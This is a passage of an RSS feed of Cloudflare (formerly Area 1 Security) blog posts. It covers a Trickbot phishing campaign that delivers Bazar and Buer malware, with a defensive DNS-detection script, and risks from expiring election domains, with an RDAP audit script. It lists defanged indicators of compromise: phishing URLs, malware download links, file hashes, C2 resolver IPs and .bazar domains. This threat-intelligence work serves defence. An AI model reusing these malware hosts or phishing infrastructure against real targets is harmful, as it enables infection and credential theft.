    <p><b>Malicious Links:</b></p><p>hxxps://pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net/handler[.]php</p><p>hxxps://fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net/handler[.]php</p><p>hxxps://03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com/index[.]html#@&lt;targeted_company_domain&gt;</p><p>hxxps://tlook-off365-signin[.]web[.]app/#@&lt;targeted_company_domain&gt;</p><p>hxxps://x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com/#@&lt;targeted_company_domain&gt;</p><p>hxxps://y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com/index[.]html?eid=@&lt;targeted_company_domain&gt;</p><p>hxxp://d-nb[.]xyz/?e=@&lt;targeted_company_domain&gt;</p><p><b>Malicious 
Sites:</b></p><p>pidbbhitbt8007dtdhdlbhhp[.]azurewebsites[.]net</p><p>fajal2a2l0jj0ccf2lf020jf[.]azurewebsites[.]net</p><p>03ssrd3334phd00p4sh0s33drcorequemenxxkjw3450w1jklsha[.]s3-ap-southeast-1[.]amazonaws[.]com</p><p>owacovctctsttc00tscqcqts0c1tq[.]s3-ap-northeast-1[.]amazonaws[.]com</p><p>y02hh200222fyhffh90yhyhh[.]s3[.]us-east-2[.]amazonaws[.]com</p><p>s3-ap-northeast-1[.]amazonaws[.]com/cxrequirement[.]sharepointeseugwpjlmahxedgkqsbjlzfgsn</p><p>storage[.]cloud[.]google[.]com/owa9y0y90yh9y9ffy2990hfy90h[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpoinnlinej27pj07jjppl7jp[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpointoneqqnfcefoqi0e6cf[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/sharedpointowauthdhljd1l0tdka0[.]appspot[.]com</p><p>storage[.]cloud[.]google[.]com/shonecov19dn1n1lnfflnbfblf1d[.]appspot[.]com</p><p>x9n44x9nvc9nn9a4l9xa4cds[.]df[.]r[.]appspot[.]com</p><p>tlook-off365-signin[.]web[.]app</p><p>d-nb[.]xyz</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Microsoft]]></category>
            <guid isPermaLink="false">4oP7jGahPui7xQ0ZuxOSCG</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Phishing campaign threatens job security, drops Bazar and Buer Malware]]></title>
            <link>https://blog.cloudflare.com/trickbot-spear-phishing-drops-malware/</link>
            <pubDate>Mon, 09 Nov 2020 15:09:00 GMT</pubDate>
            <description><![CDATA[ A phishing campaign is threatening targets with false claims of employment termination. The goal of the attacker is to intimidate employees into clicking on a link that will ultimately lead to Bazar or Buer malware infections by way of Trickbot. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in November 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>“You’re fired……NOT!” An ongoing and rapidly evolving spear phishing campaign, hitting companies across industry verticals, is threatening targets with false claims of employment termination due to economic impacts from the global pandemic, among numerous other coercive tactics. The goal of the attacker is to intimidate employees into clicking on a link that will ultimately lead to Bazar or Buer malware infections by way of Trickbot.</p><p>Researchers at Zscaler ThreatLabZ noted this is the first time they have seen the two malware strains together. Additionally, they have associated this attack with the Trickbot gang, known to use a combination of different malware groups and bots to conduct attacks.</p><p>While Trickbot started out as a banking trojan, known for hijacking victims’ browser sessions once logged into their banking website, it has since been repeatedly repurposed for other objectives, including the ability to spread ransomware. This particularly disruptive aspect of Trickbot functionality makes it a top contender for possible threats to the upcoming 2020 presidential election.</p><p>With ransomware as an option, Trickbot poses a significant threat to U.S. election infrastructure. The malware’s operators could potentially compromise a large number of voting machines during critical times in vote counting, undermining trust in the result. They might even be able to disrupt the voting process altogether by affecting entire voting locations, preventing large portions of the voter population from casting their ballots.</p><p>This could explain the recent wave of Trickbot takedown efforts. 
A report from <a href="https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/">KrebsOnSecurity</a> provided details of an operation that likely began on September 22nd and is conjectured to be a government counterstrike against the actors behind Trickbot. This activity, first identified by <a href="https://public.intel471.com/blog/trickbot-disruption-microsoft-short-term-impact/">Intel471</a> and possibly <a href="https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html">conducted by U.S. Cyber Command</a>, attempted to disrupt Trickbot infrastructure by pushing bogus configurations to the bots through the botnet’s own controllers.</p><p>These configurations swapped the real controller IP addresses for the localhost address (127.0.0.1), so infected hosts could no longer call home for commands. Not long after the phony configurations went out, all known controllers appeared to stop responding properly to bot requests, suggesting a concerted, intentional effort to disrupt this pervasive botnet’s operations.</p><p>Another attempt was made on October 1st, presumably again by U.S. Cyber Command, that similarly altered the controller IP addresses the bots needed to receive commands. Compounding the effects of this effort, <a href="https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/">Microsoft</a> also moved against Trickbot infrastructure, obtaining a court order to disable the botnet’s IP addresses, among other actions. 
Most recently, <a href="https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/">Microsoft issued an update</a> reporting that 62 of the 69 known Trickbot servers worldwide had been taken down, with the remainder being IoT devices rather than conventional hosting.</p><p>However, these attempts reportedly have only a short-term effect on Trickbot controllers, since the operators use decentralized infrastructure that communicates over Tor, with blockchain-based EmerDNS as a takedown-resistant fallback. Additionally, <a href="https://arstechnica.com/information-technology/2020/10/trickbot-the-for-hire-botnet-microsoft-attacked-is-scrambling-to-stay-alive/">Ars Technica</a> reports that Trickbot controllers are beginning to host their malware on other e-criminals’ servers.</p><p>Unsurprisingly, not long after the various Trickbot takedown operations, Area 1 Security identified a prolific phishing campaign intended to spread Bazar and Buer payloads via Trickbot. Worse yet, this newer, stealthier malware in the Trickbot gang’s arsenal can be used to deploy additional malware, including ransomware.</p><p>Area 1 Security researchers found evidence that the Bazar loader dropped in this campaign will not continue the infection if the victim device’s locale is Russian, a common guard seen with Trickbot. In fact, <a href="https://statescoop.com/recent-ransomware-surge-russian-criminal-group/">security researchers</a> believe Trickbot is the handiwork of cybercriminals operating out of Russia. Since at least 2019, this group has been responsible for a surge in ransomware attacks targeting school systems, local governments and even law enforcement agencies in the United States.</p><p>While these e-criminal groups have been operating at some level for years, their activity has surged in the lead-up to the 2020 Presidential election. This suggests that entities involved in the U.S. 
election are prime targets for foreign adversaries, nation-state and cybercriminal groups alike.</p><p>Consistent with the <a href="https://www.dni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security">recent FBI/DNI press conference</a>, Russian and Iranian state-sponsored groups have obtained voter registration information. Additionally, these nations are said to be behind separate email spoofing campaigns designed to undermine faith in the U.S. election.</p><p>At the moment, it is unclear whether the phishing campaign that Area 1 Security identified is being carried out by any of these groups, or whether it is purposefully targeting election administrators. Regardless, state and local election administrators should be extra vigilant, as they tend to be highly vulnerable to phishing attacks, as highlighted in a recent Area 1 Security phishing report.</p>
    <div>
      <h3>Threatening Lures</h3>
    </div>
    <p>This campaign employs a number of lures that threaten job security in order to intimidate targets into clicking on the provided URL. The phishing messages are very simple in their demand and appear to originate from persons of authority within the targeted company, as seen in Figure 1.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5CMJ7FcljJp8tMOV9OoRlQ/0ee883a63fe732711303f2f7b0c87e24/image4-4.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20Y9cp7fAEER9DH26On25L/11add664ba4aabd7cf2c78bb20158d74/image3-3.png" />
            
            </figure><p>Figure 1. Phishing Messages That Threaten Job Security</p><p>The messages identified in this campaign are based on eliciting fear from the target audience, focusing on either employment termination or customer complaints. The current work-from-home operating model, and the resultant decrease in face-to-face contact, gives attackers the advantage by making email delivery of these types of “employment notifications” all the more believable.</p><p>Targets of this campaign could potentially believe that the post COVID shake up in their organizations is the reason they’re being let go. With many businesses closing down unusable office space, combined with an economic recession, there is enough plausibility for this wide-ranging attack to fool employees into believing that their position may be part of the now all-too-common budget cuts.</p><p>It's possible this Bazar and Buer campaign is part of the Trickbot operations that Microsoft and other partners are trying to defeat. If so, the activity Area 1 Security observed only further proves just how difficult it can be to counteract these complex operations. A litany of unique and ever-changing email accounts and IP addresses are at the threat actor's disposal. Despite the previously mentioned efforts to neutralize Trickbot controllers, the infrastructure used to support this particular campaign (if associated in any way) was hardly affected, where the attacker seems to have promptly resumed operations.</p><p>While disruption operations may have worked a decade ago, the Trickbot gang and other groups that rely on their Malware-as-a-Service (MaaS) offering are equipped with the necessary skills to continue their attacks without a hitch. Current botnets have all the professionalism of any IT company. 
They’re able to manage disruptions and bring back services with continuity planning, backups, automated deployment, and a dedicated workforce.</p><p>The campaign noted above centered on termination-related documents available at a provided URL. When clicked, the link directs the victim’s browser to either Google Docs or Constant Contact. By linking to the payload rather than attaching it, the attacker sidesteps attachment scanning at the mail gateway. Moreover, hosting the lure on widely used, reputable cloud services lets the attacker evade reputation-based URL scanning, and makes it easy to mint new links whenever existing ones are flagged as phishing pages.</p><p>The Google Docs or Constant Contact link in the email leads to a decoy preview page, as shown in Figure 2, that prompts the victim to open a list of terminated employees. The decoy also displays the familiar “If download does not start, click here” prompt; that link is where the malware is actually hosted.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5wGzX804bISdYS6D1u6Eg2/9b56a4350a1b00c942fdb3cea3769d6d/image6-3.png" />
            
            </figure><p>Figure 2. Google Doc Decoy Preview Page with Redirect Link</p>
    <div>
      <h3>Analysis of Malware</h3>
    </div>
    <p>As seen in the figure below, after clicking on the link found in the online document, the victim is presented with a dialog box to run the file. The file is actually a malicious PE32+ executable, that is, a 64-bit Windows binary; it runs on 64-bit Windows installations, which today covers the vast majority of corporate endpoints.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RFY4kQBjiUGuDZfNoSiUZ/1b3d226538bc3f15018e9c0e21ba5e40/image2-5.png" />
            
            </figure><p>Figure 3. Gaining Run Permission</p><p>After clicking “Run”, a series of events will take place on the victim’s device that will ultimately lead to installation of the Bazar backdoor or Buer loader.</p><p>First, the PE32+ executable noted above will decrypt the payload using an RC4 cipher, a portion of which is provided in Figure 4 below. The payload happens to be none other than Trickbot, and a different RC4 key is used for each iteration of the malware.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2alOc5N1phJIaAhAZyhgx1/5acc7a4354d11e6099fd1c9dc1d02d6d/image1-4.png" />
            
            </figure><p>Figure 4. RC4 decryption of Trickbot Payload</p><p>As detailed in Figure 5, Area 1 Security researchers identified the string “dave” at the end of the Trickbot payload in memory, which is consistent with <a href="https://www.netscout.com/blog/asert/emotet-whats-changed">prior reporting</a> on techniques employed by Emotet and Trickbot malware developers. This string reveals the attacker’s use of a custom packer to compress and encrypt the file, making it difficult for malware analysts to reverse engineer the payload.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2A938DBBelje7SlUcqqVEU/658ba32f68291248ee6542ede4a08ce9/image7-1.png" />
            
            </figure><p>Figure 5. “Dave” signature</p><p>Despite this anti-reversing technique, Area 1 Security discovered that the Trickbot payload attempts to further infect the victim device by decrypting and running the BazarLoader. Loaders are an essential first-stage component: they allow attackers to gain a foothold on a host and then stage more persistent implants from their command and control servers. The tactic favors stealth by initially loading as little functionality as necessary.</p><p>In this case, the BazarLoader in turn attempts to download the Bazar backdoor by resolving names through a <a href="https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-using-blockchain-dns-from-the-market-to-the-bazar/">blockchain-based DNS system</a>. This is an attractive tactic for attackers because it removes the dependency on conventional registrars and registries, which are the usual pressure points for takedowns. Similar to bitcoin, the records for top-level domains (TLDs) like .bit, .bazar, and .coin are not held by a single authority but replicated across a peer-to-peer network. That offers users a way around censorship and other government restrictions, but it also gives attackers infrastructure that is resistant to takedown and sinkholing. Note that the bot still has to reach a resolver that understands these TLDs, which is why the outbound port 53 traffic to unusual resolvers in the indicators below is itself a detection opportunity.</p><p>As shown in Figure 6, to download the backdoor, the loader loops through eight unique IP addresses and five domains under the EmerDNS .bazar TLD.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/25QFjFOnAYTbUDnSzoXCLX/4a021c5317668f3e84d3998b3f37addc/image5-4.png" />
            
            </figure><p>Figure 6. Outbound Connections to Download the Bazar Backdoor</p><p>The second-level domains consist of 12 alphabetic characters generated by a specific <a href="https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/">domain generation algorithm</a>. The malware runs through the list of generated .bazar domains to find one that is still actively hosting the backdoor.</p><p>Once the backdoor is downloaded and successfully run, the attacker can carry out any number of malicious actions, including remotely executing commands, exfiltrating sensitive data, and deploying other payloads. These additional payloads range from post-exploitation frameworks like Cobalt Strike to ransomware like Ryuk.</p><p>In fact, Trickbot is known to deliver Ryuk ransomware via BazarLoader. In <a href="https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/">one instance</a>, after the initial Bazar infection, attackers exploited a recently disclosed vulnerability to escalate privileges and achieve domain-wide ransomware deployment just five hours after sending their phishing message. This is unfortunately just one of many possible outcomes of a successful infection via the phishing campaign Area 1 Security has observed.</p>
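<p>The blockchain-DNS behaviour described above leaves two observable traces on a network: queries for names under TLDs such as .bazar that no ordinary resolver can answer, and DNS traffic from endpoints straight to external resolvers on port 53. The following Python is an added example (not code from the original Area 1 Security post) that scores a DNS log for both. The log format is constructed for the example, the set of sanctioned corporate resolvers is an assumption, and the resolver IPs and .bazar names in the sample come from the indicator list at the end of this post.</p>

```python
"""Flag DNS behaviour matching the Bazar backdoor's blockchain-DNS lookups.

Added example, not code from the original Area 1 Security post. Two checks:
1. queries for two-label names under blockchain TLDs (EmerDNS .bazar/.coin/
   .emc/.lib, Namecoin .bit) whose second-level label is 12 alphabetic
   characters, the shape the post describes for the Bazar DGA;
2. port 53 traffic from endpoints to resolvers outside the organisation's
   sanctioned set (the bots must reach a resolver that knows these TLDs).
The log format and CORPORATE_RESOLVERS are assumptions for this example.
"""
import ipaddress
import re
from dataclasses import dataclass

BLOCKCHAIN_TLDS = {"bazar", "bit", "coin", "emc", "lib"}
# Second-level label shape described in the post: 12 alphabetic characters.
DGA_LABEL = re.compile(r"^[a-z]{12}$")

# Assumption for the example: the organisation's sanctioned resolvers.
CORPORATE_RESOLVERS = {"10.0.0.53", "10.0.1.53"}


@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    qname: str
    reason: str


def is_blockchain_dga_name(qname: str) -> bool:
    """True for <12 letters>.<blockchain tld>, e.g. bdfgimbfhgio.bazar."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) != 2:
        return False
    sld, tld = labels
    return tld in BLOCKCHAIN_TLDS and bool(DGA_LABEL.match(sld))


def is_external_resolver(dst: str) -> bool:
    """True when an endpoint talks DNS to a public address we do not run."""
    if dst in CORPORATE_RESOLVERS:
        return False
    return ipaddress.ip_address(dst).is_global


def analyse_dns_log(lines):
    """Each line: <src_ip> <dst_ip>:<port> <qname>  (constructed format)."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        src, dst_port, qname = line.split()
        dst, port = dst_port.rsplit(":", 1)
        if port != "53":
            continue
        if is_blockchain_dga_name(qname):
            alerts.append(Alert(src, dst, qname, "blockchain-tld-dga"))
        if is_external_resolver(dst):
            alerts.append(Alert(src, dst, qname, "direct-external-dns"))
    return alerts


# Constructed sample log; resolver IPs and .bazar names are from the post's IoCs.
SAMPLE_LOG = """
10.1.2.3 10.0.0.53:53 www.example.com
10.1.2.3 95.174.65.241:53 bdfgimbfhgio.bazar
10.1.2.3 151.80.222.79:53 dcehjldeghjn.bazar
10.1.2.4 10.0.0.53:53 ceggilcgigin.bazar
10.1.2.5 8.8.8.8:53 mail.example.com
"""

if __name__ == "__main__":
    for a in analyse_dns_log(SAMPLE_LOG.splitlines()):
        print(f"{a.reason:22} {a.src} -> {a.dst}  {a.qname}")
```

<p>The second check is the more durable one: the DGA label length and TLD set can change between builds, but a host that bypasses the corporate resolver to talk to arbitrary port 53 endpoints is anomalous regardless of what it asks for, and blocking outbound 53 from user subnets (except to your own resolvers) removes this fallback channel entirely.</p>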
    <div>
      <h3>Recommendations</h3>
    </div>
    <p>By leveraging a number of stealthy techniques, the threat actors behind this campaign have been able to easily evade legacy vendors and cloud email providers. Linking to legitimate, cloud-based sites within the phishing messages, combined with the use of takedown- and sinkhole-resistant EmerDNS TLDs, makes this a particularly difficult campaign to detect.</p><p>Area 1 Security‘s advanced machine learning and artificial intelligence technology allows our algorithms to uncover the clever tactics seen in this campaign, enabling us to block the messages in real time rather than waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This means malware like Trickbot, the Bazar backdoor, and follow-on infection with ransomware never have the opportunity to make their way onto our customers’ devices. Our solution has a clear advantage over post-delivery retraction: the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
    </div>
    <p><b>Phishing Email Subject Lines:</b></p><p>Re:  Termination List</p><p>RE: termination, </p><p>Re: my visit and call</p><p>Re: meeting of </p><p>RE:  office</p><p>RE: office, </p><p><b>Malicious PE32+ Executable Linked to in Decoy Document:</b></p><p>SHA-1: 895d84fc6015a9ad8d1507a99fb44350fb462c79</p><p>SHA-256: a3b2528b5e31ab1b82e68247a90ddce9a1237b2994ec739beb096f71d58e3d5b</p><p>MD5: dbdb5ddd07075b5b607460ea441cea19</p><p><b>Sites Hosting Malicious PE32+ Executable:</b></p><p>hxxps://tees321[.]com/Document3-90[.]exe</p><p>hxxps://centraldispatchinc[.]com/Report10-13[.]exe</p><p>hxxps://www[.]4rentorlando[.]com/Text_Report[.]exe</p><p><b>Malicious Links in Phishing Messages:</b></p><p>hxxps://files[.]constantcontact[.]com/0d2efd83801/50f95d03-8af1-4396-ac84-d6a7f1212026[.]pdf</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQzFpGbLRNSIpbklM51_9P78DJbhxmMLeMzQUJxX9roupKMn3xYX1ZBEjP2Jo5_CHbzoqIdVnwPeazU/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRhLU8Ar86crHTwsP7rSyStmTABnsPtQ4q3Mic9UIZN-hz06cO8fuzsiiEus9seLQHDU4T51YGcejNU/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vTVCHKzmdSD2wX03GTnyBToo4xvldfGqtFWZiz5bT5cTRozW4Xk5H6GER0GmscSPqnpyFtokphDl-_U/pub</p><p>hxxps://files[.]constantcontact[.]com/5e536f60101/8c5d270a-897a-4ac8-845a-86c920bf229c[.]pdf</p><p>hxxps://files[.]constantcontact[.]com/defde16c001/0aa90d3a-932f-4343-8661-22e4f6488705[.]pdf</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSlUktRROV3hU60c_n8LWFpOQBdyJj-N10g4tn14hBfmdaiRGKL9rc4vnTRYdLErwU0AHt7WwbzwU9q/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRFLfuWRihaQHjGEPs8-Dm7Y3VxEFRpiUJuJmD9Vm6y3xVSSG9Vc3XxRnbyHQzIoWQ_5REbdDbkOq0s/pub</p><p><b>Outbound BazarLoader DNS Requests (Port 53):</b></p><p>95[.]174[.]65[.]241:53</p><p>195[.]16[.]195[.]195:53</p><p>192[.]71[.]245[.]208:53</p><p>176[.]126[.]70[.]119:53</p><p>151[.]80[.]222[.]79:53</p><p>94[.]16[.]114[.]254:53</p><p>193[.]183[.]98[.]66:53</p><p>51[.]254[.]25[.]115:53</p><p><b>Blockchain Domains:</b></p><p>bdfgimbfhgio[.]bazar</p><p>dcehjldeghjn[.]bazar</p><p>bdfgjlbfhgjn[.]bazar</p><p>adehklafghkn[.]bazar</p><p>ceggilcgigin[.]bazar</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Microsoft]]></category>
            <guid isPermaLink="false">3MLuYtiPmUFKjdEY8WquAQ</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[With 14 days to go, we haven’t nailed the basics: election security risks from expired domains]]></title>
            <link>https://blog.cloudflare.com/2020-election-security-risks-from-expired-domains/</link>
            <pubDate>Tue, 20 Oct 2020 09:45:00 GMT</pubDate>
            <description><![CDATA[ Failure for any organization to properly register their domains poses several key risks. For example, anyone who might register an election-sensitive domain would be able to assume the identity of elections officials and send phishing emails. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>In less than two weeks, on 3 November 2020, the United States of America will hold its quadrennial Presidential election. Concerns over the cybersecurity protections and processes implemented over the preceding four years remain high, as reports of foreign interference, infrastructure vulnerabilities, and failed preparedness continue to abound.</p><p>Area 1 Security outlined the risks posed by threat actors to election administrators and their email security controls in a <a href="https://www.cloudflare.com/static/45be4c3d55f238fdfaa0f8dc301f129f/BDES-3794_CloudflareArea1_Report_PhishingBurismaHoldings_REVSEPT2022.pdf">recent report</a>, and we continue to analyze baseline security practices as the nation prepares for the elections.</p><p>Just this week, on Monday, 19 October 2020, the website for Orange County, Florida’s Supervisor of Elections was <a href="https://www.orlandosentinel.com/politics/2020-election/os-ne-2020-florida-early-voting-kicks-off-20201019-4ptenafivjhanpkgz5x6sbag64-story.html">down</a>. Florida’s fifth-most populous county had failed to renew its domain registration, something that was luckily resolved without incident. 
Four more election-sensitive domains are set to expire before Election Day on 3 November 2020:</p><p>albanywi.org 2020-10-22T15:48:51Z</p><p>bcn.net 2020-10-27T04:00:00Z</p><p>chesternh.org 2020-11-01T21:06:59.000Z</p><p>bethlehemnh.org 2020-11-02T14:07:25Z</p><p>Another 20 are set to expire before the year’s end, which could be critical if outcomes are not determined, or remain in question, before inauguration day on 20 January 2021.</p><p>arwhlaw.com 2020-11-10T05:00:00Z</p><p>cityofcumberland.net 2020-11-13T16:46:49Z</p><p>burnetcountytexas.org 2020-11-14T00:01:15Z</p><p>antwerptownship.com 2020-11-14T22:28:21Z</p><p>bessemermi.org 2020-11-15T23:58:58Z</p><p>carsoncitymi.com 2020-11-16T16:13:58Z</p><p>carrollcountyga.com 2020-11-17T18:13:46Z</p><p>buttscounty.org 2020-11-21T18:40:57.00Z</p><p>bridgeportmi.org 2020-11-21T19:20:24Z</p><p>ci.superior.wi.us 2020-11-27T23:59:59Z</p><p>bentcounty.net 2020-12-04T15:43:00Z</p><p>cityofbr.org 2020-12-06T17:31:36Z</p><p>birchruntwp.com 2020-12-16T11:25:06Z</p><p>ci.emporia.va.us 2020-12-18T23:59:59Z</p><p>hardeecountyelections.com 2020-12-20T11:59:59Z</p><p>barrecity.org 2020-12-23T17:34:03Z</p><p>alphacomm.net 2020-12-24T05:00:00Z</p><p>andersoncountyks.org 2020-12-26T16:10:34.000Z</p><p>broomecounty.us 2020-12-27T23:59:59Z</p><p>hcnj.us 2020-12-29T23:59:59Z</p><p>An extensive list of election-sensitive domain registrations is provided <a href="https://github.com/area1/exim-cve-2019-10149-data/blob/master/election-domains-by-expiration-date.txt">here</a>.</p><p>Letting a domain registration lapse exposes an organization to several key risks:</p><ol><li><p>Anyone who registers a lapsed election-sensitive domain could assume the identity of election officials and send phishing email from it; the new registrant also controls the domain’s DNS, and with it any SPF, DKIM and DMARC records that receivers would check.</p></li><li><p>Critical voter information hosted on the domain could be removed from the internet or altered.</p></li></ol>
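<p>Checking the expiry dates above by hand does not scale to the hundreds of domains in the linked list, and the data is available programmatically: every gTLD and most ccTLD registries publish RDAP, whose JSON response carries an <code>events</code> array with an <code>expiration</code> event and a <code>status</code> array with registrar lock flags. The Python below is an added example and not code from the original Area 1 Security post. It parses RDAP domain objects and flags near-term expiries and missing transfer locks; the two RDAP documents embedded in it are constructed for the example (with expiry timestamps taken from the list above), and in practice you would fetch them from the registry’s RDAP endpoint.</p>

```python
"""Audit domain expiration and transfer-lock status from RDAP data.

Added example, not code from the original Area 1 Security post. Field names
follow RFC 9083 ("events", "eventAction", "eventDate", "status", "ldhName")
and the status values follow RFC 8056. SAMPLE_RDAP is constructed for the
example; the expiry timestamps are the ones the post lists. Fetching the
documents (e.g. from https://rdap.org/domain/<name>) is left to the caller.
"""
import json
import re
from datetime import datetime, timedelta, timezone

# Accept the timestamp variants seen in the post: optional fraction, trailing Z.
_TS = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.\d+)?Z$")

# Reference date for the worked run: the day this post went out.
AS_OF = datetime(2020, 10, 20, tzinfo=timezone.utc)


def parse_rdap_time(value: str) -> datetime:
    """Parse an RDAP eventDate into an aware UTC datetime."""
    m = _TS.match(value.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {value!r}")
    naive = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
    return naive.replace(tzinfo=timezone.utc)


def expiration_from_rdap(doc: dict) -> datetime:
    for ev in doc.get("events", []):
        if ev.get("eventAction") == "expiration":
            return parse_rdap_time(ev["eventDate"])
    raise ValueError("no expiration event in RDAP response")


def audit_domain(doc: dict, now: datetime, warn_days: int = 30) -> list:
    """Return human-readable findings for one RDAP domain object."""
    findings = []
    name = doc.get("ldhName", "?").lower()
    expires = expiration_from_rdap(doc)
    remaining = expires - now
    if remaining <= timedelta(0):
        findings.append(f"{name}: EXPIRED on {expires.date()}")
    elif remaining <= timedelta(days=warn_days):
        findings.append(f"{name}: expires in {remaining.days} days ({expires.date()})")
    # Without a transfer lock, a compromised registrar account can move the domain.
    if "client transfer prohibited" not in doc.get("status", []):
        findings.append(f"{name}: no clientTransferProhibited lock")
    return findings


def audit_all(raw_docs, now: datetime, warn_days: int = 30) -> list:
    findings = []
    for raw in raw_docs:
        findings.extend(audit_domain(json.loads(raw), now, warn_days))
    return findings


# Constructed RDAP responses; the expiry dates come from the post's list.
SAMPLE_RDAP = [
    json.dumps({
        "ldhName": "albanywi.org",
        "status": ["client transfer prohibited", "client delete prohibited"],
        "events": [
            {"eventAction": "registration", "eventDate": "2010-10-22T15:48:51Z"},
            {"eventAction": "expiration", "eventDate": "2020-10-22T15:48:51Z"},
        ],
    }),
    json.dumps({
        "ldhName": "chesternh.org",
        "status": ["active"],
        "events": [
            {"eventAction": "expiration", "eventDate": "2020-11-01T21:06:59.000Z"},
        ],
    }),
]

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_RDAP, AS_OF):
        print(finding)
```

<p>Run daily against your full domain inventory, this turns a surprise outage like Orange County’s into a ticket weeks in advance. The transfer-lock check is there because renewal alone is not enough: a registrar account without the lock set lets an attacker who phishes the account move the domain out from under you before it ever expires.</p>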
    <div>
      <h3>Recommendations:</h3>
    </div>
    <ul><li><p><b>Vote!</b></p></li><li><p>Domain owners should check the expiration dates of their domains and immediately make sure they are secured for the maximum ownership time available</p></li><li><p>Observe the recommendations for securing email in the prior “<a href="https://www.cloudflare.com/static/45be4c3d55f238fdfaa0f8dc301f129f/BDES-3794_CloudflareArea1_Report_PhishingBurismaHoldings_REVSEPT2022.pdf">Phishing Election Administrators</a>” report outlining the risks to election administrators and officials.</p></li></ul> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">NwYtNygHsw5VB68vyBFyr</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Spike in Amazon phishing for Prime Day: a new day of deals means new phishing campaigns]]></title>
            <link>https://blog.cloudflare.com/2020-amazon-prime-day-phishing/</link>
            <pubDate>Tue, 13 Oct 2020 14:33:00 GMT</pubDate>
